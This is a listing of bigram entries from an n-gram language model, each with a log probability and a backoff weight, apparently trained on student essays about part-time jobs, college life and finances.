-1.5924584 best chance -0.048957378
-2.64845 can use -0.048957378
-2.3711007 to use -0.20946135
-1.8797346 little use -0.048957378
-2.784949 they use -0.048957378
-2.0878363 into use -0.048957378
-2.064357 good use -0.048957378
-2.035199 must use -0.048957378
-1.5880291 best use -0.048957378
-0.6932658 normally use -0.048957378
-2.8842342 the theories -0.048957378
-3.2979217 and practices -0.048957378
-2.4197767 for classes -0.048957378
-2.727085 the classes -0.048957378
-3.1669025 , classes -0.048957378
-2.9349952 in classes -0.048957378
-2.934131 and classes -0.048957378
-3.0017767 of classes -0.048957378
-3.113704 to classes -0.048957378
-2.388789 their classes -0.187397
-2.1651096 such classes -0.048957378
-2.2306914 some classes -0.048957378
-1.7899655 taking classes -0.048957378
-2.3312085 my classes -0.048957378
-1.1654861 attend classes -0.048957378
-0.99141985 Attending classes -0.048957378
-1.2893543 attending classes -0.048957378
-2.7282374 I fll -0.048957378
-2.162571 you fll -0.048957378
-1.9188446 They fll -0.048957378
-2.1342583 will know -0.048957378
-3.2641199 to know -0.048957378
-1.6844487 employers know -0.048957378
-1.9072032 They know -0.048957378
-1.292295 fll know -0.048957378
-1.7243168 n't know -0.04895735
-1.8823773 really know -0.048957378
-2.2645695 we know -0.048957378
-2.533827 I what -0.048957378
-2.5359979 with what -0.048957378
-2.7506387 for what -0.048957378
-2.2438226 , what -0.1722646
-2.1471057 and what -0.048957378
-2.015888 of what -0.11268411
-2.69565 to what -0.048957378
-2.4374714 from what -0.048957378
-1.803285 on what -0.13618872
-2.0260594 -LRB- what -0.048957378
-2.4733903 or what -0.048957378
-2.280254 do what -0.048957378
-1.140326 know what -0.048957378
-1.2818278 nor what -0.048957378
-1.1605179 Learning what -0.048957378
-2.0275047 out what -0.048957378
-2.1385293 learn what -0.048957378
-0.9880859 sacrifice what -0.048957378
-1.5188853 appreciate what -0.048957378
-1.3799449 realize what -0.048957378
-1.1605179 yet what -0.048957378
-1.2818278 determine what -0.048957378
-1.162232 choosing what -0.048957378
-1.514158 us what -0.048957378
-0.69074637 payback what -0.048957378
-0.69074637 destroying what -0.048957378
-0.69074637 tell what -0.048957378
-2.2898738 one works -0.048957378
-2.2892714 what works -0.048957378
-2.2910626 what doesn -0.048957378
-1.4716616 don ft. -0.048957378
-0.69410884 doesn ft. -0.048957378
-0.69410884 hadn ft. -0.048957378
-1.8079702 I could -0.04895735
-2.324456 this could -0.048957378
-2.076529 that could -0.04895735
-2.5774457 job could -0.048957378
-3.0300741 , could -0.048957378
-2.7927094 and could -0.048957378
-1.829094 course could -0.048957378
-2.2640738 study could -0.048957378
-2.3481624 experience could -0.048957378
-2.1455538 studies could -0.048957378
-2.3859735 jobs could -0.048957378
-2.0946295 but could -0.048957378
-1.5759982 experiences could -0.048957378
-1.3771682 industry could -0.048957378
-1.5218195 parents could -0.048957378
-2.0457268 This could -0.048957378
-1.4531673 major could -0.048957378
-1.2834638 nor could -0.048957378
-1.5184352 graduates could -0.048957378
-0.988917 solution could -0.048957378
-0.69116527 gifted could -0.048957378
-0.69116527 Universities could -0.048957378
-0.69116527 Which could -0.048957378
-1.1617546 man could -0.048957378
-3.4931862 , expanding -0.048957378
-2.4177067 by expanding -0.048957378
-1.8383135 your horizons -0.048957378
-1.1708648 thus increasing -0.048957378
-1.295562 ever increasing -0.048957378
-2.2010837 job opportunities -0.187397
-3.4163227 to opportunities -0.048957378
-2.3673859 The opportunities -0.048957378
-1.8487579 job after -0.04895735
-2.8235707 is after -0.048957378
-2.5009751 student after -0.048957378
-2.6542263 time after -0.048957378
-1.8691221 work after -0.04895735
-2.6244867 have after -0.048957378
-1.624704 offer after -0.048957378
-2.0592365 into after -0.048957378
-1.9518652 enough after -0.048957378
-2.3033705 do after -0.048957378
-1.1629949 opportunities after -0.048957378
-2.3535383 all after -0.048957378
-2.360202 them after -0.048957378
-2.3337302 life after -0.048957378
-1.5750064 adult after -0.048957378
-0.6915846 encounter after -0.048957378
-1.5197701 until after -0.048957378
-1.752015 home after -0.048957378
-0.98974967 got after -0.048957378
-0.6915846 teenagers after -0.048957378
-0.6915846 Massachusetts after -0.048957378
-2.0329945 In conclusion -0.20946135
-2.7181385 I encourage -0.048957378
-2.8944666 to encourage -0.048957378
-2.5494218 should encourage -0.048957378
-2.1138942 even encourage -0.048957378
-1.7724454 for all -0.04895735
-2.4961305 it all -0.048957378
-2.4818623 be all -0.048957378
-2.8685791 , all -0.048957378
-2.4532244 not all -0.048957378
-1.9334091 In all -0.048957378
-2.153808 in all -0.37638456
-1.9970981 of all -0.048957378
-1.7129669 For all -0.048957378
-2.2904274 experience all -0.048957378
-1.9499487 from all -0.048957378
-1.3695211 tired all -0.048957378
-1.7837205 focus all -0.048957378
-2.3924165 or all -0.048957378
-1.632078 are all -0.099168696
-1.2690912 at all -0.048957378
-2.0151947 spend all -0.048957378
-1.5561762 put all -0.048957378
-2.2828355 people all -0.048957378
-1.8412559 They all -0.048957378
-2.2168543 when all -0.048957378
-1.6478826 use all -0.048957378
-2.0753345 after all -0.048957378
-1.3671163 encourage all -0.048957378
-2.2896473 them all -0.048957378
-1.904745 believe all -0.048957378
-2.2708921 life all -0.048957378
-1.5031465 explore all -0.048957378
-0.9847774 Should all -0.048957378
-1.7355717 understand all -0.048957378
-2.153615 we all -0.048957378
-1.5584989 complete all -0.048957378
-1.3695211 within all -0.048957378
-1.2753446 cover all -0.048957378
-0.6890748 covered all -0.048957378
-0.6890748 behooves all -0.048957378
-1.1556058 indeed all -0.048957378
-0.6890748 standing all -0.048957378
-0.6890748 amongst all -0.048957378
-1.3799049 disagree because -0.048957378
-1.056526 statement because -0.187397
-2.7771356 that because -0.048957378
-2.5922155 job because -0.048957378
-2.4548295 is because -0.048957378
-3.0569723 , because -0.048957378
-2.3959112 jobs because -0.048957378
-2.230697 school because -0.048957378
-2.1403506 college because -0.048957378
-2.3037157 more because -0.048957378
-0.9894719 advantage because -0.048957378
-1.5188298 workers because -0.048957378
-0.9894719 unfortunate because -0.048957378
-1.622227 But because -0.048957378
-1.8079246 responsibility because -0.048957378
-1.5188298 simply because -0.048957378
-1.52019 banned because -0.048957378
-1.1625811 activity because -0.048957378
-1.1625811 behind because -0.048957378
-1.2845579 properly because -0.048957378
-1.2845579 places because -0.048957378
-0.69144475 ages because -0.048957378
-2.5221097 the opportunity -0.27955192
-2.3354475 The opportunity -0.048957378
-1.5555515 an opportunity -0.11268411
-2.3557408 important opportunity -0.048957378
-1.4662849 educational opportunity -0.048957378
-2.067544 good opportunity -0.048957378
-1.9319644 no opportunity -0.048957378
-0.6934062 wonderful opportunity -0.048957378
-2.4724946 with them -0.048957378
-1.6759287 for them -0.14912641
-2.49764 of them -0.048957378
-2.284967 to them -0.11268411
-2.3825915 from them -0.048957378
-1.6080599 benefit them -0.048957378
-1.0032557 gives them -0.048957378
-0.9719988 help them -0.09038658
-1.8910046 take them -0.048957378
-1.3677793 encourage them -0.048957378
-1.5572013 teach them -0.048957378
-1.0969558 give them -0.099168696
-1.9568233 make them -0.048957378
-1.156013 allowing them -0.048957378
-1.603563 force them -0.048957378
-0.4075199 prepares them -0.187397
-1.156013 giving them -0.048957378
-0.68921393 awaits them -0.048957378
-1.8533039 support them -0.048957378
-0.47519362 allows them -0.50140065
-1.508652 let them -0.048957378
-1.156013 enables them -0.048957378
-0.4738289 teaches them -0.048957378
-0.9850521 brought them -0.048957378
-0.5822481 preparing them -0.048957378
-0.68921393 kill them -0.048957378
-1.2758812 serve them -0.048957378
-1.156013 cause them -0.048957378
-1.374476 interest them -0.048957378
-0.879848 assist them -0.13618872
-1.156013 prepare them -0.048957378
-0.68921393 encouraging them -0.048957378
-0.68921393 treating them -0.048957378
-0.68921393 distracts them -0.048957378
-0.68921393 fed them -0.048957378
-0.68921393 impress them -0.048957378
-0.68921393 guide them -0.048957378
-0.68921393 suits them -0.048957378
-3.0230536 their present -0.048957378
-0.6942867 present situations -0.048957378
-3.0230536 their futures -0.048957378
-2.7324119 <s> Japanese -0.04895735
-2.9032245 that Japanese -0.048957378
-3.087084 of Japanese -0.048957378
-3.215579 to Japanese -0.048957378
-2.2765498 if Japanese -0.048957378
-2.1257288 most Japanese -0.048957378
-1.3873869 As Japanese -0.048957378
-1.5302515 workers Japanese -0.048957378
-2.0924752 young Japanese -0.048957378
-0.6931254 typical Japanese -0.048957378
-2.3701181 many distractions -0.048957378
-1.8928705 little distractions -0.048957378
-1.9898291 enough distractions -0.048957378
-2.9516091 for real -0.048957378
-2.4001164 a real -0.04895735
-2.0256789 the real -0.51468724
-2.1770935 not real -0.048957378
-3.0267124 in real -0.048957378
-2.9101167 their real -0.048957378
-2.3354475 The real -0.048957378
-2.8054512 are real -0.048957378
-3.0607083 is therefore -0.048957378
-2.9280992 , therefore -0.048957378
-2.7167566 and therefore -0.04895735
-3.3489213 to therefore -0.048957378
-1.8884475 It therefore -0.048957378
-2.109757 can provide -0.13618872
-2.643165 will provide -0.048957378
-2.668018 not provide -0.048957378
-2.8238015 to provide -0.048957378
-1.8236004 also provide -0.048957378
-1.9166929 jobs provide -0.048957378
-1.1671549 thus provide -0.048957378
-2.2535412 they provide -0.048957378
-1.463795 colleges provide -0.048957378
-2.3033736 would provide -0.048957378
-1.9283917 years provide -0.048957378
-2.7689722 be useful -0.048957378
-2.9155905 that useful -0.048957378
-3.1138833 a useful -0.048957378
-2.6598978 will useful -0.048957378
-2.1415925 very useful -0.048957378
-2.4326057 people useful -0.048957378
-2.4152584 all useful -0.048957378
-1.9312015 provide useful -0.048957378
-0.9930965 extremely useful -0.048957378
-2.3846152 this society -0.048957378
-2.7474363 the society -0.048957378
-2.207863 in society -0.04895735
-2.35614 of society -0.11268411
-2.805557 to society -0.048957378
-2.8372147 their society -0.048957378
-0.85448766 Japanese society -0.13618872
-2.3312151 fs society -0.048957378
-1.4629536 free society -0.048957378
-0.6927047 broader society -0.048957378
-0.991978 modern society -0.048957378
-0.6927047 consumerist society -0.048957378
-0.6927047 @ society -0.048957378
-3.014355 their specialized -0.048957378
-1.295562 highly specialized -0.048957378
-3.09512 <s> Workers -0.048957378
-2.3059957 be expected -0.187397
-2.7556913 not expected -0.048957378
-2.8837602 are expected -0.048957378
-2.920025 to function -0.048957378
-3.3047535 a broad -0.048957378
-3.4000094 the range -0.048957378
-0.6942267 broad range -0.048957378
-3.28005 of contexts -0.048957378
-3.644728 <s> Evaluations -0.048957378
-3.3032444 <s> must -0.048957378
-2.6444798 it must -0.048957378
-1.7280687 student must -0.04895735
-2.9159434 and must -0.048957378
-2.364132 students must -0.04895735
-2.3363032 also must -0.048957378
-2.2397017 one must -0.048957378
-2.240784 they must -0.048957378
-1.629438 There must -0.048957378
-1.8745332 people must -0.048957378
-0.9911411 Workers must -0.048957378
-1.5245031 workers must -0.048957378
-1.673106 Students must -0.048957378
-1.3836298 she must -0.048957378
-2.2331133 we must -0.048957378
-0.6922843 context must -0.048957378
-2.880715 be familiar -0.048957378
-3.1699133 of done -0.048957378
-2.170065 has done -0.048957378
-1.8597006 being done -0.048957378
-2.7526727 have done -0.04895735
-2.004456 things done -0.048957378
-1.5344893 anything done -0.048957378
-1.8747771 this area -0.048957378
-2.4503036 their area -0.187397
-2.393125 fs area -0.048957378
-2.7232327 of specialty -0.048957378
-1.4597349 <s> If -0.14450496
-3.0607083 is n't -0.048957378
-1.1330452 do n't -0.13332285
-1.5933044 did n't -0.048957378
-0.40935975 wo n't -0.048957378
-0.40935975 ca n't -0.048957378
-2.7082691 I whatever -0.048957378
-2.9939594 for whatever -0.048957378
-3.3971481 , whatever -0.048957378
-2.709754 on whatever -0.048957378
-2.3718047 do whatever -0.048957378
-2.7329264 job might -0.048957378
-2.4294076 experience might -0.048957378
-2.8121924 they might -0.048957378
-1.16925 employer might -0.048957378
-2.2734885 what might -0.048957378
-2.272803 we might -0.048957378
-2.8497334 they produce -0.048957378
-1.4712842 might produce -0.048957378
-3.4625692 , fit -0.048957378
-2.1934187 not fit -0.048957378
-3.4163227 to fit -0.048957378
-3.644728 <s> Neither -0.048957378
-2.637264 , nor -0.04895735
-1.1708648 customer nor -0.048957378
-2.7708678 <s> Learning -0.04895735
-2.4029973 by itself -0.048957378
-3.0728445 in itself -0.048957378
-2.5414824 working itself -0.048957378
-1.4687891 factor itself -0.048957378
-0.9942178 manifest itself -0.048957378
-3.644728 <s> Because -0.048957378
-2.0522041 's external -0.048957378
-3.014355 their subject -0.048957378
-0.6942267 specific subject -0.048957378
-2.722524 will interfere -0.048957378
-2.5091865 jobs interfere -0.048957378
-2.4448311 their grades -0.048957378
-2.0264761 better grades -0.048957378
-2.08053 good grades -0.048957378
-1.8357852 high grades -0.048957378
-2.7309246 with specialization -0.048957378
-1.3904605 <s> It -0.36882287
-3.0414262 is usually -0.048957378
-2.6862712 will usually -0.048957378
-2.8121924 they usually -0.048957378
-2.0392778 's usually -0.048957378
-2.8351026 are usually -0.048957378
-1.727343 n't usually -0.048957378
-2.2753892 some menial -0.048957378
-2.010357 doing menial -0.048957378
-1.4704666 usually menial -0.048957378
-3.3047535 a specialist -0.048957378
-3.1303647 is useless -0.048957378
-2.5969746 I get -0.048957378
-1.5868676 can get -0.099168696
-2.109548 will get -0.048957378
-2.3463118 and get -0.04895735
-1.920955 to get -0.071063936
-2.3583682 students get -0.048957378
-2.2329066 one get -0.048957378
-2.478221 should get -0.048957378
-1.4958241 they get -0.09038658
-2.5458775 or get -0.048957378
-1.8848168 They get -0.048957378
-2.1286578 could get -0.048957378
-2.3731618 them get -0.048957378
-1.7094948 n't get -0.048957378
-1.45804 usually get -0.048957378
-1.8618116 really get -0.048957378
-1.3812549 ultimately get -0.048957378
-1.5226038 actually get -0.048957378
-1.5379899 chosen fields -0.048957378
-1.4712842 different fields -0.048957378
-3.09512 <s> Internships -0.187397
-1.9441198 provide relevant -0.048957378
-1.3916435 various relevant -0.048957378
-1.1705118 areas relevant -0.048957378
-2.842708 be another -0.048957378
-1.8640044 find another -0.048957378
-1.3909432 hold another -0.048957378
-0.9944986 Yet another -0.048957378
-1.295562 another source -0.048957378
-1.9687632 our source -0.048957378
-3.2676826 of temptation -0.048957378
-1.1708648 sample temptation -0.048957378
-2.968909 that colleges -0.048957378
-3.284121 the colleges -0.048957378
-3.1764908 and colleges -0.048957378
-2.9605632 their colleges -0.048957378
-1.7680029 Japanese colleges -0.048957378
-3.2496762 the club -0.048957378
-2.9430885 their club -0.048957378
-2.5665698 from club -0.048957378
-2.6663196 or club -0.048957378
-1.4683161 whether club -0.048957378
-1.9376127 provide club -0.048957378
-2.5041373 in activities -0.048957378
-2.6748512 college activities -0.048957378
-1.6757944 These activities -0.048957378
-1.6318686 same activities -0.048957378
-0.8840058 club activities -0.048957378
-1.5590689 social activities -0.04895735
-1.6380178 these activities -0.048957378
-0.6925645 genuine activities -0.048957378
-1.1659027 community activities -0.048957378
-0.3786424 extra-curricular activities -0.04895735
-0.6925645 Said activities -0.048957378
-0.6925645 extracurricular activities -0.048957378
-0.99169886 recreational activities -0.048957378
-0.6925645 group activities -0.048957378
-2.9818435 students socialize -0.048957378
-2.8983755 are sufficient -0.048957378
-1.8673797 find sufficient -0.048957378
-2.1342583 will teach -0.187397
-3.2641199 to teach -0.048957378
-2.3805175 also teach -0.048957378
-2.472681 jobs teach -0.048957378
-2.3685565 may teach -0.048957378
-1.5901128 helps teach -0.048957378
-1.908163 ft teach -0.048957378
-2.4193864 them teach -0.048957378
-3.3032444 <s> how -0.048957378
-2.8273203 , how -0.048957378
-2.9233415 in how -0.048957378
-2.9159434 and how -0.13618872
-2.9865563 of how -0.048957378
-2.8372316 students how -0.048957378
-2.1193862 you how -0.048957378
-2.4628558 at how -0.048957378
-2.3820214 them how -0.048957378
-1.1701529 learning how -0.27955192
-1.2899935 learn how -0.27955192
-1.757883 understand how -0.048957378
-1.8416208 Japan how -0.048957378
-0.9911411 knew how -0.048957378
-1.5832012 hand how -0.048957378
-1.1650699 taught how -0.048957378
-3.4650414 to behave -0.048957378
-2.6044638 student away -0.048957378
-2.2275927 time away -0.187397
-1.9577026 take away -0.048957378
-2.4242916 them away -0.048957378
-1.467546 takes away -0.048957378
-0.69354665 moved away -0.048957378
-0.69354665 possess away -0.048957378
-1.8144643 will give -0.11268411
-2.4025857 and give -0.27955192
-2.8627641 to give -0.048957378
-1.923414 jobs give -0.187397
-2.80292 they give -0.048957378
-1.2928529 fll give -0.048957378
-2.3196363 would give -0.048957378
-2.4510674 them unstructured -0.048957378
-2.561604 with social -0.048957378
-2.654057 the social -0.048957378
-3.043315 , social -0.048957378
-1.947863 and social -0.12260215
-2.892758 of social -0.048957378
-2.7202551 their social -0.048957378
-1.2840105 highly social -0.048957378
-1.9849048 future social -0.048957378
-2.3034658 important social -0.048957378
-1.5086619 into social -0.048957378
-0.691305 unstructured social -0.048957378
-1.3778466 immediate social -0.048957378
-1.3778466 various social -0.048957378
-1.1621677 building social -0.048957378
-2.1489596 learn social -0.048957378
-0.9891944 joining social -0.048957378
-1.9180458 our social -0.048957378
-1.574284 develop social -0.048957378
-0.9891944 stronger social -0.048957378
-0.691305 inherent social -0.048957378
-0.691305 communicative social -0.048957378
-0.9891944 changing social -0.048957378
-0.691305 exciting social -0.048957378
-2.7309246 with unpredictable -0.048957378
-0.6942867 unpredictable results -0.048957378
-2.0881407 become unwilling -0.048957378
-2.709418 with fellow -0.048957378
-2.9787707 their fellow -0.048957378
-2.5811288 from fellow -0.048957378
-2.3897333 my fellow -0.048957378
-3.4931862 , teachers -0.048957378
-3.2799814 and teachers -0.048957378
-3.1303647 is unworthy -0.048957378
-3.4204583 the finely -0.048957378
-0.6942867 finely honed -0.048957378
-3.2177634 the workers -0.048957378
-3.1476786 of workers -0.048957378
-2.7665734 time workers -0.048957378
-2.4264548 all workers -0.048957378
-0.69354665 honed workers -0.048957378
-0.69354665 unmotivated workers -0.048957378
-0.69354665 Restaurant workers -0.048957378
-2.5542762 the demands -0.13618872
-2.543778 money demands -0.048957378
-2.0112066 society demands -0.048957378
-2.1644623 I strongly -0.3194954
-0.99501497 depends strongly -0.048957378
-1.3882775 I believe -0.3018265
-1.8301041 also believe -0.187397
-1.9103436 ft believe -0.048957378
-1.1688302 strongly believe -0.40449065
-1.8844885 really believe -0.048957378
-1.1688302 truly believe -0.048957378
-0.99365675 firmly believe -0.048957378
-1.8426979 it fs -0.13332285
-2.7957687 that fs -0.048957378
-1.7236531 student fs -0.06505798
-1.0015756 there fs -0.11268411
-0.9294223 one fs -0.07613316
-1.0063283 today fs -0.04895735
-1.6246173 There fs -0.048957378
-1.8566378 It fs -0.048957378
-1.4576565 club fs -0.048957378
-1.5760767 someone fs -0.048957378
-1.5231947 let fs -0.048957378
-1.2856548 anyone fs -0.048957378
-1.7090132 person fs -0.048957378
-0.9900276 break fs -0.048957378
-1.7430158 individual fs -0.048957378
-0.6917244 What fs -0.048957378
-0.6917244 Mammon fs -0.048957378
-0.6917244 father fs -0.048957378
-0.6917244 grandfather fs -0.048957378
-0.6917244 Let fs -0.048957378
-2.3569517 the main -0.099168696
-2.3673859 The main -0.099168696
-1.595883 two main -0.187397
-1.829562 a lot -0.27406517
-2.276171 this life -0.048957378
-1.7769203 for life -0.1722646
-1.9681419 valuable life -0.048957378
-2.4229236 student life -0.048957378
-1.6830112 in life -0.19828911
-2.6758318 and life -0.048957378
-2.0048287 of life -0.1722646
-2.3063238 their life -0.048957378
-1.9315253 working life -0.048957378
-2.3148212 students life -0.187397
-2.1932824 school life -0.048957378
-1.4935124 college life -0.099168696
-1.9616446 future life -0.048957378
-1.7548814 real life -0.048957378
-1.6122129 useful life -0.048957378
-1.2258745 social life -0.04895735
-1.2721993 fs life -0.11268411
-1.888749 university life -0.048957378
-1.9663883 make life -0.048957378
-1.6101788 professional life -0.048957378
-1.7243153 enjoy life -0.048957378
-1.9488368 about life -0.048957378
-1.5613256 great life -0.048957378
-0.9861529 complicated life -0.048957378
-1.2780342 positive life -0.048957378
-1.3725495 essential life -0.048957378
-1.6183119 later life -0.048957378
-1.9663883 his life -0.048957378
-0.8020367 daily life -0.187397
-0.9861529 everyday life -0.048957378
-0.6897705 \/ life -0.048957378
-0.9861529 private life -0.048957378
-0.9861529 enjoying life -0.048957378
-0.6897705 boring life -0.048957378
-3.340304 , entering -0.048957378
-3.2905889 to entering -0.048957378
-2.3127947 are entering -0.048957378
-1.9802761 through entering -0.048957378
-1.4683348 transition entering -0.048957378
-1.7279366 before entering -0.048957378
-0.69354665 postpone entering -0.048957378
-2.5628006 the workforce -0.13618872
-1.1705118 Having prior -0.048957378
-0.9947796 workforce prior -0.048957378
-0.9947796 exists prior -0.048957378
-1.7715586 Many recently-graduated -0.048957378
-2.9060166 are woefully -0.048957378
-0.6942867 woefully unprepared -0.048957378
-3.4000094 the realities -0.048957378
-0.99501497 mundane realities -0.048957378
-2.7912447 the responsibilities -0.04895735
-2.3377671 many responsibilities -0.048957378
-3.0629127 and responsibilities -0.048957378
-2.6676896 of responsibilities -0.048957378
-0.5546695 additional responsibilities -0.13618872
-2.3520532 important responsibilities -0.048957378
-2.1284394 social responsibilities -0.048957378
-1.2917377 balancing responsibilities -0.048957378
-0.6932658 scholastic responsibilities -0.048957378
-2.873293 be particularly -0.048957378
-2.637264 , particularly -0.04895735
-2.8554769 for university -0.048957378
-2.9859018 a university -0.048957378
-2.3028388 many university -0.048957378
-2.9159434 and university -0.048957378
-2.6201468 of university -0.048957378
-1.4596765 leave university -0.048957378
-2.0577664 then university -0.048957378
-2.5637717 or university -0.048957378
-1.4001786 through university -0.187397
-1.9324389 at university -0.048957378
-0.9911411 view university -0.048957378
-0.6922843 hire university -0.048957378
-1.1650699 At university -0.048957378
-1.2878569 cover university -0.048957378
-0.9911411 onto university -0.048957378
-0.6922843 contemporary university -0.048957378
-2.811696 be used -0.048957378
-3.0414262 is used -0.048957378
-2.0743403 become used -0.048957378
-2.0047097 well used -0.048957378
-2.8351026 are used -0.048957378
-1.6424524 never used -0.048957378
-3.244391 of staying -0.048957378
-3.4163227 to staying -0.048957378
-2.8837602 are staying -0.048957378
-2.8122976 is up -0.048957378
-1.7813659 taking up -0.048957378
-1.3785262 show up -0.048957378
-1.9241494 take up -0.048957378
-1.669152 give up -0.048957378
-1.1625811 staying up -0.048957378
-1.4539922 make up -0.048957378
-1.4547855 entirely up -0.048957378
-1.1625811 weigh up -0.048957378
-1.8350438 getting up -0.048957378
-0.3782798 growing up -0.04895735
-0.70787346 end up -0.048957378
-0.70787346 taken up -0.048957378
-0.69144475 ending up -0.048957378
-0.9894719 setting up -0.048957378
-0.69144475 passed up -0.048957378
-0.69144475 speed up -0.048957378
-0.9894719 grow up -0.048957378
-0.69144475 add up -0.048957378
-0.69144475 picking up -0.048957378
-0.69144475 catch up -0.048957378
-0.69144475 ended up -0.048957378
-3.3677967 , late -0.048957378
-2.0396311 often late -0.048957378
-3.0569165 in late -0.048957378
-2.9430885 their late -0.048957378
-2.1244118 up late -0.048957378
-1.5341265 until late -0.048957378
-3.4000094 the night -0.048957378
-2.5303967 at night -0.048957378
-2.859086 be sleeping -0.048957378
-2.9492288 , sleeping -0.048957378
-1.4704666 poor sleeping -0.048957378
-3.5096595 , neglecting -0.048957378
-3.014355 their commitments -0.048957378
-1.9211627 academic commitments -0.048957378
-2.1287274 with no -0.048957378
-2.506663 is no -0.04895735
-3.2241242 , no -0.048957378
-2.9719586 in no -0.048957378
-2.9937658 and no -0.048957378
-3.050927 of no -0.048957378
-1.591366 has no -0.048957378
-1.8788315 have no -0.04895735
-2.6019366 or no -0.048957378
-2.7516074 are no -0.048957378
-1.8527182 had no -0.048957378
-0.99225736 virtually no -0.048957378
-2.9605632 their immediate -0.048957378
-2.3543274 The immediate -0.048957378
-1.3902439 show immediate -0.048957378
-2.2677426 get immediate -0.048957378
-1.9389359 no immediate -0.048957378
-1.3925304 immediate repercussions -0.048957378
-2.7312138 a result -0.048957378
-3.321535 the result -0.048957378
-2.3608074 The result -0.048957378
-1.9176081 ; result -0.048957378
-2.710804 it difficult -0.187397
-2.2832484 be difficult -0.048957378
-3.1356838 a difficult -0.048957378
-3.0052547 is difficult -0.187397
-1.4643939 often difficult -0.048957378
-1.5891323 been difficult -0.048957378
-2.0727339 learning difficult -0.048957378
-1.1684108 sometimes difficult -0.048957378
-2.1142278 can make -0.048957378
-1.812036 will make -0.13618872
-3.0629127 and make -0.048957378
-1.7910886 to make -0.067588836
-2.3643124 may make -0.048957378
-1.9709816 should make -0.048957378
-1.7599807 To make -0.048957378
-2.4326057 people make -0.048957378
-1.1679918 shall make -0.048957378
-1.8350283 necessary lifestyle -0.048957378
-2.0452929 's lifestyle -0.048957378
-1.5935729 adult lifestyle -0.048957378
-0.69396824 well-rounded lifestyle -0.048957378
-1.2958019 lifestyle adjustment -0.048957378
-3.2979217 and subsequent -0.048957378
-1.7519542 <s> A -0.16549833
-0.99501497 c A -0.048957378
-3.5096595 , undertaken -0.048957378
-2.6891787 I still -0.048957378
-2.7198546 it still -0.048957378
-2.118745 can still -0.048957378
-3.022964 is still -0.048957378
-3.1159992 and still -0.048957378
-2.3127947 are still -0.048957378
-1.155879 while still -0.04895735
-2.2967534 be quite -0.187397
-2.2305765 is quite -0.04895735
-2.0775375 become quite -0.048957378
-1.3902439 itself quite -0.048957378
-1.8887417 really quite -0.048957378
-2.859086 be helpful -0.048957378
-1.583305 very helpful -0.187397
-1.5370556 quite helpful -0.187397
-2.7187858 with regard -0.048957378
-2.4476333 this regard -0.048957378
-1.2950919 With regard -0.048957378
-3.09512 <s> Maintaining -0.048957378
-2.0524554 valuable exercise -0.048957378
-3.1138833 a personal -0.048957378
-3.160214 the personal -0.048957378
-2.526607 in personal -0.048957378
-3.0629127 and personal -0.048957378
-2.418458 their personal -0.04895735
-2.0304089 's personal -0.048957378
-2.4152584 all personal -0.048957378
-1.3890452 managing personal -0.048957378
-2.3621502 my personal -0.048957378
-2.3748312 many recent -0.048957378
-1.7708699 Many recent -0.048957378
-2.9793792 for graduates -0.048957378
-3.2496762 the graduates -0.048957378
-1.9390326 university graduates -0.048957378
-0.40930387 recent graduates -0.048957378
-1.8593426 new graduates -0.048957378
-0.69368714 minted graduates -0.048957378
-1.5379899 graduates similarly -0.048957378
-1.5956279 made similarly -0.048957378
-2.7972748 have difficulty -0.048957378
-3.0808864 is managing -0.048957378
-2.9385355 , managing -0.187397
-2.5503032 in managing -0.048957378
-3.21812 of managing -0.048957378
-3.3144484 , finances -0.048957378
-2.9101167 their finances -0.048957378
-2.2827988 if finances -0.048957378
-1.8567461 family finances -0.048957378
-2.0154495 about finances -0.048957378
-2.3675284 my finances -0.048957378
-2.0342937 his finances -0.048957378
-0.6934062 unless finances -0.048957378
-3.4000094 the responsibly -0.048957378
-1.6467657 finances responsibly -0.048957378
-2.3772526 many western -0.048957378
-2.3701181 many countries -0.048957378
-1.7695215 Many countries -0.048957378
-0.69410884 western countries -0.048957378
-2.45335 this unfortunate -0.048957378
-3.120598 is unfortunate -0.048957378
-3.4000094 the reality -0.048957378
-0.99501497 unfortunate reality -0.048957378
-2.0522888 often combines -0.048957378
-3.4000094 the levels -0.048957378
-1.8382648 high levels -0.048957378
-3.0728445 in debt -0.048957378
-3.1933482 of debt -0.048957378
-2.7334032 college debt -0.048957378
-2.025878 future debt -0.048957378
-1.4696376 reduce debt -0.048957378
-2.700248 with credit -0.048957378
-2.839973 the credit -0.048957378
-2.709754 on credit -0.048957378
-2.093081 If credit -0.048957378
-0.6938276 Using credit -0.048957378
-1.6922824 use cards -0.048957378
-0.21341059 credit cards -0.048957378
-2.6128922 student loans -0.048957378
-3.1699133 of loans -0.048957378
-2.7018807 on loans -0.048957378
-2.1419587 -RRB- loans -0.048957378
-1.7661085 tuition loans -0.048957378
-1.8308595 your loans -0.048957378
-2.637264 , etc. -0.13618872
-0.6942267 uniforms etc. -0.048957378
-3.1293185 in grave -0.048957378
-2.013212 financial peril -0.048957378
-3.1215048 in providing -0.048957378
-2.2432292 only providing -0.048957378
-3.321535 the cash -0.048957378
-3.21812 of cash -0.048957378
-1.7676849 personal cash -0.048957378
-0.69396824 substantial cash -0.048957378
-1.2958019 cash flow -0.048957378
-3.4000094 the least -0.048957378
-1.9512843 at least -0.187397
-2.4247963 a small -0.13618872
-1.5384331 even small -0.048957378
-2.8890827 for income -0.048957378
-3.063924 the income -0.048957378
-2.0716856 any income -0.048957378
-2.6398885 of income -0.048957378
-2.8372147 their income -0.048957378
-1.4644498 additional income -0.048957378
-2.305698 The income -0.048957378
-2.3925824 an income -0.048957378
-1.8243035 extra income -0.048957378
-2.237829 some income -0.048957378
-1.462143 added income -0.048957378
-1.2895159 needed income -0.048957378
-0.6927047 modest income -0.048957378
-2.5237396 with which -0.048957378
-2.5146606 , which -0.13618872
-2.1738102 in which -0.13618872
-2.7303507 and which -0.048957378
-2.5436628 of which -0.187397
-2.3280525 experience which -0.048957378
-2.58383 work which -0.048957378
-1.5665365 f which -0.048957378
-2.4222057 money which -0.048957378
-1.6157081 degree which -0.048957378
-1.2807405 internships which -0.048957378
-1.7689643 skills which -0.048957378
-1.8141 environment which -0.048957378
-1.9507065 doing which -0.048957378
-1.1005982 something which -0.048957378
-1.9674705 activities which -0.048957378
-2.3046746 life which -0.048957378
-1.7641524 responsibilities which -0.048957378
-1.7910352 income which -0.048957378
-2.070445 world which -0.048957378
-0.98753273 `` which -0.048957378
-1.709859 against which -0.048957378
-1.3737917 system which -0.048957378
-1.657756 week which -0.048957378
-0.69046736 facts which -0.048957378
-0.69046736 travel which -0.048957378
-0.69046736 sum which -0.048957378
-0.69046736 paths which -0.048957378
-2.0748606 smoking which -0.048957378
-3.4650414 to counter -0.048957378
-2.1964433 such debts -0.048957378
